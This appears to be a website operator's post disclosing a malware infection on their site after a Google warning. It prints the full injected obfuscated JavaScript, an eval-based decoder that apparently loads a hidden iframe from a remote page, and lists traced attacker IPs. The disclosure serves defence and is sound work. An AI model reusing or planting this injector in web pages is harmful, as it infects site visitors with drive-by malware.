We had a long way to deal with malware on our website, nonetheless such things happens ( to put it nicely )

We received a Google notification this morning by their automated monitoring tools about malware infection on the website.

"We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com."

So we started checking all server logs on this and we managed to locate the exact timeframe, method but still working on the exploit

We can and will undisclose the full embedded malware code here along with all traced IPs that were related to the malicious attachs

CODE
&lt!--32f02e--><script type="text/javascript" language="javascript">mjgp="y";uxy="document";try{+function(){if(document.querySelector)--(window

[uxy].getElementById("asd"))}()}catch(rxhga){sni=function(eifnkj){eifnkj="fro"+eifnkj;for(lmfx=0;lmfx<mjgp.length;lmfx++){hdrqg+=String[eifnkj]

(xven(zdram+(mjgp[lmfx]))-(17));}};};xven=(window.eval);zdram="0x";zxiqiu=0;if(!zxiqiu){try{++xven(uxy)["\x62o"+"d"+mjgp]}catch(rxhga)

{nzgmoa="(";}mjgp="31(77(86(7f(74(85(7a(80(7f(31(84(41(4a(39(3a(31(8c(1e(1b(31(87(72(83(31(84(85(72(85(7a(74(4e(38(72(7b(72(89(38(4c(1e(1b(31

(87(72(83(31(74(80(7f(85(83(80(7d(7d(76(83(4e(38(7a(7f(75(76(89(3f(81(79(81(38(4c(1e(1b(31(87(72(83(31(84(31(4e(31(75(80(74(86(7e(76(7f(85(3f

(74(83(76(72(85(76(56(7d(76(7e(76(7f(85(39(38(7a(77(83(72(7e(76(38(3a(4c(1e(1b(1e(1b(31(84(3f(84(83(74(31(4e(31(38(79(85(85(81(4b(40(40(7e(7a

(7f(75(77(86(7d(74(7a(85(8a(3f(74(80(7e(40(57(7a(7f(76(36(43(41(84(7d(7a(75(76(83(40(55(73(54(79(7e(44(5d(5c(3f(81(79(81(38(4c(1e(1b(31(84(3f

(84(85(8a(7d(76(3f(81(80(84(7a(85(7a(80(7f(31(4e(31(38(72(73(84(80(7d(86(85(76(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(74(80(7d(80(83(31(4e(31

(38(44(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(79(76(7a(78(79(85(31(4e(31(38(44(81(89(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(88(7a(75(85(79(31

(4e(31(38(44(81(89(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(7d(76(77(85(31(4e(31(38(42(41(41(41(44(38(4c(1e(1b(31(84(3f(84(85(8a(7d(76(3f(85(80

(81(31(4e(31(38(42(41(41(41(44(38(4c(1e(1b(1e(1b(31(7a(77(31(39(32(75(80(74(86(7e(76(7f(85(3f(78(76(85(56(7d(76(7e(76(7f(85(53(8a(5a(75(39(38

(84(38(3a(3a(31(8c(1e(1b(31(75(80(74(86(7e(76(7f(85(3f(88(83(7a(85(76(39(38(4d(81(31(7a(75(4e(6d(38(84(6d(38(31(74(7d(72(84(84(4e(6d(38(84(41

(4a(6d(38(31(4f(4d(40(81(4f(38(3a(4c(1e(1b(31(75(80(74(86(7e(76(7f(85(3f(78(76(85(56(7d(76(7e(76(7f(85(53(8a(5a(75(39(38(84(38(3a(3f(72(81(81

(76(7f(75(54(79(7a(7d(75(39(84(3a(4c(1e(1b(31(8e(1e(1b(8e(1e(1b(77(86(7f(74(85(7a(80(7f(31(64(76(85(54(80(80(7c(7a(76(39(74(80(80(7c(7a(76(5f

(72(7e(76(3d(74(80(80(7c(7a(76(67(72(7d(86(76(3d(7f(55(72(8a(84(3d(81(72(85(79(3a(31(8c(1e(1b(31(87(72(83(31(85(80(75(72(8a(31(4e(31(7f(76(88

(31(55(72(85(76(39(3a(4c(1e(1b(31(87(72(83(31(76(89(81(7a(83(76(31(4e(31(7f(76(88(31(55(72(85(76(39(3a(4c(1e(1b(31(7a(77(31(39(7f(55(72(8a(84

(4e(4e(7f(86(7d(7d(31(8d(8d(31(7f(55(72(8a(84(4e(4e(41(3a(31(7f(55(72(8a(84(4e(42(4c(1e(1b(31(76(89(81(7a(83(76(3f(84(76(85(65(7a(7e(76(39(85

(80(75(72(8a(3f(78(76(85(65(7a(7e(76(39(3a(31(3c(31(44(47(41(41(41(41(41(3b(43(45(3b(7f(55(72(8a(84(3a(4c(1e(1b(31(75(80(74(86(7e(76(7f(85(3f

(74(80(80(7c(7a(76(31(4e(31(74(80(80(7c(7a(76(5f(72(7e(76(3c(33(4e(33(3c(76(84(74(72(81(76(39(74(80(80(7c(7a(76(67(72(7d(86(76(3a(1e(1b(31(3c

(31(33(4c(76(89(81(7a(83(76(84(4e(33(31(3c(31(76(89(81(7a(83(76(3f(85(80(58(5e(65(64(85(83(7a(7f(78(39(3a(31(3c(31(39(39(81(72(85(79(3a(31(50

(31(33(4c(31(81(72(85(79(4e(33(31(3c(31(81(72(85(79(31(4b(31(33(33(3a(4c(1e(1b(8e(1e(1b(77(86(7f(74(85(7a(80(7f(31(58(76(85(54(80(80(7c(7a(76

(39(31(7f(72(7e(76(31(3a(31(8c(1e(1b(31(87(72(83(31(84(85(72(83(85(31(4e(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f(7a(7f(75(76(89(60

(77(39(31(7f(72(7e(76(31(3c(31(33(4e(33(31(3a(4c(1e(1b(31(87(72(83(31(7d(76(7f(31(4e(31(84(85(72(83(85(31(3c(31(7f(72(7e(76(3f(7d(76(7f(78(85

(79(31(3c(31(42(4c(1e(1b(31(7a(77(31(39(31(39(31(32(84(85(72(83(85(31(3a(31(37(37(1e(1b(31(39(31(7f(72(7e(76(31(32(4e(31(75(80(74(86(7e(76(7f

(85(3f(74(80(80(7c(7a(76(3f(84(86(73(84(85(83(7a(7f(78(39(31(41(3d(31(7f(72(7e(76(3f(7d(76(7f(78(85(79(31(3a(31(3a(31(3a(1e(1b(31(8c(1e(1b(31

(83(76(85(86(83(7f(31(7f(86(7d(7d(4c(1e(1b(31(8e(1e(1b(31(7a(77(31(39(31(84(85(72(83(85(31(4e(4e(31(3e(42(31(3a(31(83(76(85(86(83(7f(31(7f(86

(7d(7d(4c(1e(1b(31(87(72(83(31(76(7f(75(31(4e(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f(7a(7f(75(76(89(60(77(39(31(33(4c(33(3d(31(7d

(76(7f(31(3a(4c(1e(1b(31(7a(77(31(39(31(76(7f(75(31(4e(4e(31(3e(42(31(3a(31(76(7f(75(31(4e(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f

(7d(76(7f(78(85(79(4c(1e(1b(31(83(76(85(86(83(7f(31(86(7f(76(84(74(72(81(76(39(31(75(80(74(86(7e(76(7f(85(3f(74(80(80(7c(7a(76(3f(84(86(73(84

(85(83(7a(7f(78(39(31(7d(76(7f(3d(31(76(7f(75(31(3a(31(3a(4c(1e(1b(8e(1e(1b(7a(77(31(39(7f(72(87(7a(78(72(85(80(83(3f(74(80(80(7c(7a(76(56(7f

(72(73(7d(76(75(3a(1e(1b(8c(1e(1b(7a(77(39(58(76(85(54(80(80(7c(7a(76(39(38(87(7a(84(7a(85(76(75(70(86(82(38(3a(4e(4e(46(46(3a(8c(8e(76(7d(84

(76(8c(64(76(85(54(80(80(7c(7a(76(39(38(87(7a(84(7a(85(76(75(70(86(82(38(3d(31(38(46(46(38(3d(31(38(42(38(3d(31(38(40(38(3a(4c(1e(1b(1e(1b(84

(41(4a(39(3a(4c(1e(1b(8e(1e(1b(8e".split(nzgmoa);hdrqg="";sni("mCharCode");xven(""+hdrqg);}</script>&lt!--/32f02e-->


IPs

CODE
66.39.3.161
5.199.161.25
161.58.174.175
64.71.32.11
205.186.180.10
173.254.40.162
98.118.152.139
84.154.221.218
213.115.125.17





View the full article